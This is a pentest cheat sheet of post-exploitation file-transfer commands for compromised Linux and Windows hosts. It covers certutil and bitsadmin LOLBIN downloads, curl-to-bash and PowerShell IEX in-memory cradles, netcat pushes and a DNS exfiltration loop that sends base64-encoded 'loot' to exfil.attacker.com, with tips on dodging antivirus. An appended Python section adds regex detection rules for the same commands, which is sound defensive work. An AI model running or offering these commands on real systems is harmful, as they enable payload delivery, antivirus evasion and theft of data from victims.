CyberCheatsheets

File Transfer Cheat Sheet

Move files to and from compromised Linux and Windows hosts — HTTP, SMB, netcat, base64, and living-off-the-land binaries.

Category: Utilities & Shells
Tags: exfiltration, file-transfer, lolbins, pentest, post-exploitation
Updated 2026-06-17

Overview

Getting tools onto a target and data back off is a constant pentest task. The right method depends on what's installed and what egress is allowed. This sheet covers serving files, downloading with built-in binaries (LOLBINs), and clever fallbacks when normal transfers are blocked.

Authorized testing only. Transfer files only on systems you own or have explicit written permission to test.

Serve files from your box

Quick HTTP server for the current directory

python3 -m http.server 8000

Bind to a specific interface

python3 -m http.server 8000 --bind 10.10.14.5

SMB server (great for Windows targets)

impacket-smbserver share . -smb2support

Authenticated SMB (newer Windows requires it)

impacket-smbserver share . -smb2support -user u -password p

PHP built-in server (alternative)

php -S 0.0.0.0:8000

Download to Linux

wget

wget http://10.10.14.5:8000/linpeas.sh -O /tmp/lp.sh

curl

curl http://10.10.14.5:8000/lp.sh -o /tmp/lp.sh

Run straight from memory (no disk write)

curl http://10.10.14.5:8000/lp.sh | bash

scp (when you have SSH creds)

scp file user@10.10.14.5:/tmp/

Download to Windows

certutil LOLBIN download

certutil -urlcache -split -f http://10.10.14.5:8000/nc.exe nc.exe

PowerShell Invoke-WebRequest

powershell iwr http://10.10.14.5:8000/nc.exe -OutFile nc.exe

In-memory PowerShell cradle

powershell IEX(New-Object Net.WebClient).DownloadString('http://10.10.14.5:8000/p.ps1')

Copy from your SMB share

copy \\10.10.14.5\share\nc.exe .

bitsadmin LOLBIN

bitsadmin /transfer j http://10.10.14.5:8000/f.exe C:\Windows\Temp\f.exe

Netcat transfer (no HTTP/SMB)

Receiver listens and writes the file

nc -lvnp 9001 > out.bin

Sender pushes the file

nc 10.10.14.5 9001 < file.bin

With ncat + TLS (encrypted)

ncat --ssl -lvnp 9001 > out.bin          # receiver
ncat --ssl 10.10.14.5 9001 < file.bin    # sender

Fallbacks when transfers are blocked

Base64 a small file, paste it into the shell, decode

base64 -w0 file.bin    # then on target:  echo <b64> | base64 -d > file.bin

Windows base64 decode (certutil)

certutil -decode b64.txt file.bin

Exfiltrate over DNS when only DNS egress works

for c in $(base64 -w0 loot | fold -w50); do nslookup $c.exfil.attacker.com; done

Pull a file out via an existing SSH session (reverse scp)

scp user@target:/path/loot .

Tips

  • On modern Windows, impacket-smbserver needs -smb2support and often auth — set a user/password.
  • Pipe straight to bash/iex to avoid writing to disk and tripping file-based AV.
  • certutil and bitsadmin are signed LOLBINs — they download even when PowerShell is locked down.
  • base64-paste is the universal fallback for small files when no network transfer works.
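
Blue-team view of the same commands, as an added example that is not part of the original sheet: the download one-liners above leave distinctive process command lines, including the in-memory ones that never write a file. The rule names and the sample events are constructed for illustration.

```python
import re

# Rule name -> regex over a process command line. Patterns mirror the commands
# listed on this sheet; the rule names are made up for this example.
RULES = {
    "certutil_urlcache_download": re.compile(
        r"\bcertutil(\.exe)?\b(?=.*[-/]urlcache\b)(?=.*\bhttps?://)", re.I),
    "certutil_decode": re.compile(r"\bcertutil(\.exe)?\b.*[-/]decode\b", re.I),
    "bitsadmin_transfer": re.compile(
        r"\bbitsadmin(\.exe)?\b.*/transfer\b.*\bhttps?://", re.I),
    "powershell_download_cradle": re.compile(
        r"(?=.*\b(iex|invoke-expression)\b)(?=.*\bdownloadstring\b)", re.I),
    "powershell_iwr_outfile": re.compile(
        r"\b(iwr|invoke-webrequest)\b(?=.*\bhttps?://)(?=.*-outfile\b)", re.I),
    "fetch_piped_to_shell": re.compile(
        r"\b(curl|wget)\b[^|]*\bhttps?://[^|]*\|\s*(ba|z|da)?sh\b", re.I),
    "smb_copy_from_ip": re.compile(
        r"\bcopy\b.*\\\\\d{1,3}(\.\d{1,3}){3}\\", re.I),
}

def classify(cmdline):
    """Return the sorted names of every rule the command line matches."""
    return sorted(name for name, rx in RULES.items() if rx.search(cmdline))

# Constructed process-creation events (host, command line); not real telemetry.
SAMPLE_EVENTS = [
    ("ws01", "certutil -urlcache -split -f http://10.10.14.5:8000/nc.exe nc.exe"),
    ("ws01", "certutil -decode b64.txt file.bin"),
    ("ws02", "bitsadmin /transfer j http://10.10.14.5:8000/f.exe C:\\Windows\\Temp\\f.exe"),
    ("ws02", "powershell IEX(New-Object Net.WebClient)"
             ".DownloadString('http://10.10.14.5:8000/p.ps1')"),
    ("web1", "curl http://10.10.14.5:8000/lp.sh | bash"),
    ("web1", "curl https://example.com/release.tar.gz -o /tmp/release.tar.gz"),  # benign
    ("ws03", "certutil -verify server.cer"),                                     # benign
]

def triage(events):
    """Return (host, cmdline, hits) for events matching at least one rule."""
    out = []
    for host, cmd in events:
        hits = classify(cmd)
        if hits:
            out.append((host, cmd, hits))
    return out

if __name__ == "__main__":
    for host, cmd, hits in triage(SAMPLE_EVENTS):
        print(f"{host}: {','.join(hits)} <- {cmd}")
```

Feed it command lines from process-creation logging (for example Sysmon Event ID 1 or auditd execve records); plain downloads to disk with curl or wget are left unflagged on purpose to keep noise down.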
